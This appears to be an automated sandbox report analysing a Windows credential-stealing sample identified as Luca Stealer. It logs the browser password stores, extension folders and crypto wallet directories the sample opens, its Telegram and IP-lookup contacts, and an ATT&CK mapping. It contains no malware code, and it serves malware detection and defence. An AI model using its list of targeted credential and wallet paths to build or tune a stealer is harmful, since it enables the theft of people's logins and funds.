                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegllJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpeiJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbbJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmndedJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajgJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior

                    Remote Access Functionality

                    barindex
                    Yara detected Luca Stealer
                    Source: Yara matchFile source: 888.exe, type: SAMPLE
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.0.888.exe.f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.888.exe.f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2711187553.0000000000974000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2711187553.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2710106623.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2711570869.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2709905866.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2710305791.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2710305791.0000000000973000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2710106623.000000000095D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2710587236.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2709905866.000000000094F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 888.exe PID: 5752, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		11
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		LSASS Memory31
                    Security Software Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                    Virtualization/Sandbox Evasion                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection                    		NTDS31
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Obfuscated Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeylogging4
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    System Network Configuration Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    File Deletion                    		DCSync1
                    File and Directory Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem23
                    System Information Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    888.exe53%ReversingLabsWin32.Trojan.Barys
                    888.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://cdn.ipwhois.io/flags/us.svg0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ipwho.is
                    		108.181.61.49
                    		truefalse
                      		high
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://ac.ecosia.org/autocomplete?q=888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/chrome_newtab888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://ipwho.is/?output=json888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.ico888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://ipwho.is/?output=jsonF888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmpfalse
                                    		high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://ipwho.is/?output=jsonFx888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmpfalse
                                        		high
                                        https://docs.rs/getrandom#nodejs-es-module-support0888.exefalse
                                          		high
                                          https://docs.rs/getrandom#nodejs-es-module-support888.exefalse
                                            		high
                                            http://www.w3.or888.exefalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://ns.adobe.888.exefalse
                                                    		high
                                                    https://www.ecosia.org/newtab/888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.ipwhois.io/flags/us.svg888.exe, 00000000.00000002.2711121286.000000000094F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2710271153.000000000094F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2709905866.000000000094F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        149.154.167.220
                                                        		api.telegram.orgUnited Kingdom
                                                        		62041TELEGRAMRUfalse
                                                        108.181.61.49
                                                        		ipwho.isCanada
                                                        		852ASN852CAfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1574586
                                                        Start date and time:2024-12-13 12:44:45 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 6m 18s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Run name:Run with higher sleep bypass
                                                        Number of analysed new started processes analysed:6
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:888.exe
                                                        Detection:MAL
                                                        Classification:mal84.troj.spyw.evad.winEXE@4/15@2/2
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:Failed
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                        • Stop behavior analysis, all processes terminated

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: 888.exe

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        149.154.167.220https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                          XClient.exeGet hashmaliciousXWormBrowse
                                                            file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                installer.exeGet hashmaliciousUnknownBrowse
                                                                  installer.exeGet hashmaliciousUnknownBrowse
                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                          108.181.61.49Cracker.exeGet hashmaliciousLuca StealerBrowse
                                                                          • /?output=json

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          api.telegram.orghttps://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 149.154.167.220
                                                                          XClient.exeGet hashmaliciousXWormBrowse
                                                                          • 149.154.167.220
                                                                          file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                          • 149.154.167.220
                                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                          • 149.154.167.220
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          ipwho.ishttps://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156Get hashmaliciousTechSupportScamBrowse
                                                                          • 108.181.61.49
                                                                          Loader.exeGet hashmaliciousQuasarBrowse
                                                                          • 108.181.61.49
                                                                          Hydra.ccLoader.batGet hashmaliciousUnknownBrowse
                                                                          • 108.181.61.49
                                                                          full.exeGet hashmaliciousQuasarBrowse
                                                                          • 108.181.61.49
                                                                          https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938Get hashmaliciousTechSupportScamBrowse
                                                                          • 108.181.61.49
                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                          • 103.126.138.87
                                                                          TeudA4phjN.exeGet hashmaliciousQuasarBrowse
                                                                          • 103.126.138.87
                                                                          http://www.sbh.co.uk/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                          • 103.126.138.87
                                                                          file.exeGet hashmaliciousQuasarBrowse
                                                                          • 103.126.138.87

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          TELEGRAMRUhttps://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 149.154.167.220
                                                                          XClient.exeGet hashmaliciousXWormBrowse
                                                                          • 149.154.167.220
                                                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                          • 149.154.167.99
                                                                          file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                          • 149.154.167.220
                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                          • 149.154.167.99
                                                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                          • 149.154.167.99
                                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                          • 149.154.167.99
                                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          ASN852CAhttps://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156Get hashmaliciousTechSupportScamBrowse
                                                                          • 108.181.61.49
                                                                          Loader.exeGet hashmaliciousQuasarBrowse
                                                                          • 108.181.61.49
                                                                          arm7.nn-20241213-0355.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 50.98.219.123
                                                                          Hydra.ccLoader.batGet hashmaliciousUnknownBrowse
                                                                          • 108.181.61.49
                                                                          full.exeGet hashmaliciousQuasarBrowse
                                                                          • 108.181.61.49
                                                                          jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                          • 75.158.230.151
                                                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                                                          • 198.166.177.229
                                                                          mips.elfGet hashmaliciousMiraiBrowse
                                                                          • 142.41.252.248
                                                                          https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938Get hashmaliciousTechSupportScamBrowse
                                                                          • 108.181.61.49

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0ehttps://opof.utackhepr.com/WE76L1u/Get hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          taskhost.exeGet hashmaliciousXWormBrowse
                                                                          • 149.154.167.220
                                                                          XClient.exeGet hashmaliciousXWormBrowse
                                                                          • 149.154.167.220
                                                                          Loader.exeGet hashmaliciousQuasarBrowse
                                                                          • 149.154.167.220
                                                                          smb.ps1Get hashmaliciousXmrigBrowse
                                                                          • 149.154.167.220
                                                                          j87MOFviv4.lnkGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          DvGZE4FU02.lnkGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          j3z5kxxt52.lnkGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          zpbiw0htk6.lnkGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):0.7307872139132228
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlllule//l:NllU+
                                                                          MD5:F3E50284A5DDB75A262B65844F4FAB1B
                                                                          SHA1:F6DA5603EE20F99A9BD4BB0948D9A622752AE5F3
                                                                          SHA-256:E39BAB6FD654762AB2B5D58A78A1F88EBE6D1DFC824F63CA43DC4930C2AD8411
                                                                          SHA-512:4F5D81F917AF9968EDD292BEA64E9C07B64691ED2BF9CA0C15D5C6051AEE6C10EE49C88326E9C8C42D143533FA113DE1DD70FFF290351A408B5E0A3A6625F8E4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:@...e.................................O.........................

                                                                          C:\Users\user\AppData\Local\Temp\Cookies

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                          Category:dropped
                                                                          Size (bytes):20480
                                                                          Entropy (8bit):0.6732424250451717
                                                                          Encrypted:false
                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\CreditCardData

                                                                          Download File
